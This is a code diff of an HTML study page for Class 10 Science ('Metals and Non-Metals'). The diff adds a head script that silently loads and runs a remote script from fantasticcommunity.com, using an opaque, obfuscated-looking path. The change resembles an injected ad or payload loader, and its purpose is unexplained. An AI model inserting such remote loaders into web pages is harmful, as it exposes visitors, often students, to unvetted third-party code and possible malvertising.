--- a/M&Npdf10.html
+++ b/M&Npdf10.html
@@ -1,6 +1,18 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+    <script>
+(function(gtskl){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = gtskl || {};
+s.src = "\/\/fantasticcommunity.com\/c.D_9k6obC2\/5JlSSAWDQk9ZNajAch1dMxzrYB3cNwCN0h2nNozlUEzhNQjfcZ1_";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Board Buddy - Metals and Non-Metals Class 10 Science (27 Pages)</title>
@@ -317,4 +329,5 @@
     </script>
 
 </body>
+
 </html>
